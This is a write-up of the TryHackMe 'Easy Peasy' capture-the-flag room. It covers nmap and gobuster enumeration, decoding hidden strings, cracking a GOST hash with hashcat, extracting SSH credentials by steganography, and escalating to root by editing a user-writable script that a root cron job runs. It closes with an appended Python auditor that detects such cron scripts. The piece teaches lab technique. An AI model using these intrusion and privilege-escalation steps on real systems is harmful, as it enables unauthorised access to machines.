TryHackMe: Easy Peasy

Having fun with TryHackMe again. So, here is the write-up and guideline to pass the Easy Peasy challenge.

Room: https://tryhackme.com/room/easypeasyctf
Level: Easy

Task: Use your skills to access the user and root account!

Here is the first look at the webpage. Nothing special here, I think. According to the Wappalyzer extension, the version of nginx running is 1.16.1.

Let's do a fast scan of the IP using nmap:

# nmap -A -T4 10.10.124.84
.....
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.16.1
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: nginx/1.16.1
|_http-title: Welcome to nginx!
.....

Only 1 port shows up, 80/tcp, but unfortunately that is the wrong answer. By default we only scan ports 0–1000, so the answer must be in a larger port range. So scan the rest, ports 1000–65535. This scan takes about 1 hour, so grab a coffee first ☕

# nmap -p 1000-65535 -sV -A -T4 10.10.124.84
6498/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 30:4a:2b:22:ac:d9:56:09:f2:da:12:20:57:f4:6c:d4 (RSA)
| 256 bf:86:c9:c7:b7:ef:8c:8b:b9:94:ae:01:88:c0:85:4d (ECDSA)
|_ 256 a1:72:ef:6c:81:29:13:ef:5a:6c:24:03:4c:fe:3d:0b (ED25519)
65524/tcp open http Apache httpd 2.4.43 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.43 (Ubuntu)
|_http-title: Apache2 Debian Default Page: It works

Now there are 3 ports open in total (80, 6498 and 65524), and there are 2 HTTP services running, nginx and Apache:

http://10.10.X.X:80 → nginx (1.16.1)
http://10.10.X.X:65524 → apache (2.4.43)

Now I need to find flag 1. I planned to brute-force port 80 first, using gobuster:

# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.124.84 -t 40
...
/hidden (Status: 301)
...

Only 1 path found. Let's head to the page.

There is no hint here, even in the code. Maybe there is a hint in the image? Using steghide,

# steghide extract -sf ~/lost-places-1928727_960_720.jpg

No luck here. Hmm. Retry one more time using gobuster from this page:

# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.124.84/hidden -t 40
...
/whatever (Status: 301)
...

Only 1 path found. Let's head to the page.

There is some kind of encoded text in the code. It looks like base64 to me.

# echo "ZmxhZ3XXXXXX19mbDRnfQ==" | base64 --decode
XXXX{f1rs7_fl4g}

Now flag 1 is found! 👍

Now flag 2. So far no other path has been found. From the last page, I tried to extract any info from the image.

# steghide extract -sf ~/norway-772991_960_720.jpg

Still no luck. There is another HTTP port, 65524. So open the webpage.

Luckily, flag number 3 is hidden here. 😂 Done 3rd flag.

The 2nd flag is still pending. I tried to inspect the page to see any hidden message or hint.

So here it is. “its encoded with ba….” base64? base32? Using cyberchef,

Using a base62 decoder, it's a path, and it's the 4th flag 😂. The 2nd flag is still not solved yet… So I brute-forced with gobuster from http://10.10.X.X:65524/

# gobuster dir -w ~/wordlists/dirb/common.txt -u http://10.10.X.X:65524 -t 40
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/.hta (Status: 403)
/index.html (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)

Only 2 with status 200. Ignore index.html because it's the current page. So let's see robots.txt.

The User-Agent value is an MD5 hash. Going by the placeholder in the question, ****{**************}, it must not exist in any dictionary. Brute forcing it might not finish until the end of the world 😅

I decided to try several online MD5 decoders.

So much of a hassle here. Now I finally got the 2nd flag.

Okay, now, from the 4th flag, open the webpage. It has a matrix wallpaper and a floating image at the top center. When inspecting the code, there is a hash.

Using a hash analyzer, it's SHA-256. So I can use hashcat to decode it:

# hashcat -m 1400 "940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81" ~/easypeasy.txt --force

No luck! Let's take a look at the hint: it says GOST. From hashcat,

# hashcat -h | grep "GOST"
6900 | GOST R 34.11-94 | Raw Hash
11700 | GOST R 34.11-2012 (Streebog) 256-bit, big-endian | Raw Hash
11800 | GOST R 34.11-2012 (Streebog) 512-bit, big-endian | Raw Hash

Let's try 6900:

# hashcat -m 6900 "940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81" ~/easypeasy.txt --force
940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81:XXXXXXXXXXXXXXXXXXXXXXX

Alright! Got the 5th flag. So now, dead end again. Then I remembered that the hidden web page contains 2 images. Let's see if anything can be extracted from the images:

# steghide extract -sf matrix-.jpg
Enter passphrase:
steghide: could not extract any data with that passphrase!
# steghide extract -sf binarycodepixabay.jpg
Enter passphrase:
wrote extracted data to "secrettext.txt".
# cat secrettext.txt
username:XXXXXXX
password:01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 XXXXXXXX 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 XXXXXXXX 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 XXXXXXXX

So it looks like we found credentials for SSH. The password is encoded as binary. Use cyberchef to decode it.

After that, access SSH:

# ssh XXXXXX@10.10.X.X -p 6498
The authenticity of host '[10.10.X.X]:6498 ([10.10.X.X]:6498)' can't be established.
ECDSA key fingerprint is SHA256:hnBqxfTM/MVZzdifMyu9Ww1bCVbnzSpnrdtDQN6zSek.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.X.X]:6498' (ECDSA) to the list of known hosts.
********************************************************************
** This connection are monitored by government offical **
** Please disconnect if you are not authorized **
** A lawsuit will be filed against you if the law is not followed **
********************************************************************
XXXXXX@10.10.X.X's password:
You Have 1 Minute Before AC-130 Starts Firing
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
!!!!!!!!!!!!!!!!!!I WARN YOU !!!!!!!!!!!!!!!!!!!!
You Have 1 Minute Before AC-130 Starts Firing
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
!!!!!!!!!!!!!!!!!!I WARN YOU !!!!!!!!!!!!!!!!!!!!
XXXXXX@kral4-PC:~$

So access is working; now I need to capture the next flag.

# ls -al
total 40
drwxr-xr-x 5 boring boring 4096 Jun 15 2020 .
drwxr-xr-x 3 root root 4096 Jun 14 2020 ..
-rw------- 1 boring boring 2 Mar 3 23:36 .bash_history
-rw-r--r-- 1 boring boring 220 Jun 14 2020 .bash_logout
-rw-r--r-- 1 boring boring 3130 Jun 15 2020 .bashrc
drwx------ 2 boring boring 4096 Jun 14 2020 .cache
drwx------ 3 boring boring 4096 Jun 14 2020 .gnupg
drwxrwxr-x 3 boring boring 4096 Jun 14 2020 .local
-rw-r--r-- 1 boring boring 807 Jun 14 2020 .profile
-rw-r--r-- 1 boring boring 83 Jun 14 2020 user.txt

There is user.txt. Let's see:

# cat user.txt
User Flag But It Seems Wrong Like It`s Rotated Or Something
synt{a0jvgf33zfa0ez4y}

When it says rotated, it might be the ROT family. Using cyberchef again, the 6th flag is captured.

XXXX{n0wits33msXXXXXX}

The last one: capture root.txt.

“You Have 1 Minute Before AC-130 Starts Firing” → I feel like it's a cron job. I started to look around.

# crontab -e
# cat /etc/crontab
....
* * * * * root cd /var/www/ && sudo bash .mysecretcronjob.sh
...

There is a hidden shell script, located in /var/www, that runs every minute.

# ls -al /var/www
...
-rwxr-xr-x 1 XXXXXX XXXXXX 33 Jun 14 2020 .mysecretcronjob.sh
...

The shell script belongs to XXXXXX. Ha! I can simply write a command in it to gain access to root's files.

# nano .mysecretcronjob.sh
ls -al /root > /root_dir.txt

Let's wait for a while.

# cat /root_dir.txt
...
-rw-r--r-- 1 root root 39 Jun 15 2020 .root.txt

Now we know where the final flag is located. So edit the shell script again and wait for a while.

# nano .mysecretcronjob.sh
cat /root/.root.txt > /root_flag.txt
# cat /root_flag.txt
flag{63a9f0ea7bb98050796b649e854CCCCC}

Now Yeah! Mission completed!!
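
A defender's check for the cron weakness used above, as an added example that is not part of the original write-up: it parses /etc/crontab-format entries, resolves the script each root job runs (including a relative path after `cd`, as in this room), and reports scripts owned by a non-root user or writable by group/others. The function names, the `root` parameter and the sample crontab text are assumptions made for this illustration.

```python
import os
import re
import shlex
import stat

# Constructed sample in /etc/crontab format; the last entry is the one from this write-up.
SAMPLE_CRONTAB = """SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root cd /var/www/ && sudo bash .mysecretcronjob.sh
"""
INTERPRETERS = {"sh", "bash", "dash", "python3", "perl"}  # run their first argument
WRAPPERS = {"sudo", "nice", "nohup"}                      # prefixes to skip over

def script_paths(command):
    """Yield absolute paths of the scripts a cron command runs, following `cd`."""
    cwd = "/"
    for part in re.split(r"&&|\|\||;", command):
        words = shlex.split(part)
        while words and words[0] in WRAPPERS:
            words.pop(0)
        if len(words) > 1 and words[0] == "cd":
            cwd = os.path.normpath(os.path.join(cwd, words[1]))
        elif len(words) > 1 and os.path.basename(words[0]) in INTERPRETERS:
            args = [w for w in words[1:] if not w.startswith("-")]
            if args and "-c" not in words:
                yield os.path.normpath(os.path.join(cwd, args[0]))
        elif words and "/" in words[0]:
            yield os.path.normpath(os.path.join(cwd, words[0]))

def audit_crontab(text, root="/", trusted_uids=frozenset({0})):
    """Return (script, reason) pairs for root cron scripts a non-root user can edit."""
    findings = []
    for line in text.splitlines():
        fields = line.split(None, 6)  # five time fields, user, command
        if line.lstrip().startswith("#") or len(fields) < 7 or fields[5] != "root":
            continue
        for path in script_paths(fields[6]):
            real = os.path.join(root, path.lstrip("/"))  # `root` lets tests use a temp tree
            if not os.path.exists(real):
                continue
            st = os.stat(real)
            if st.st_uid not in trusted_uids:
                findings.append((path, f"owned by uid {st.st_uid}"))
            elif st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((path, "group/world writable"))
    return findings

if __name__ == "__main__":
    print(audit_crontab(SAMPLE_CRONTAB))
```

Feed it the contents of /etc/crontab on the host being reviewed. A finding is fixed by making the script root-owned with mode 0755 or stricter, and the directory holding it needs the same treatment, since a writable directory lets the file be replaced.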

Software Engineer at Teratotech.com
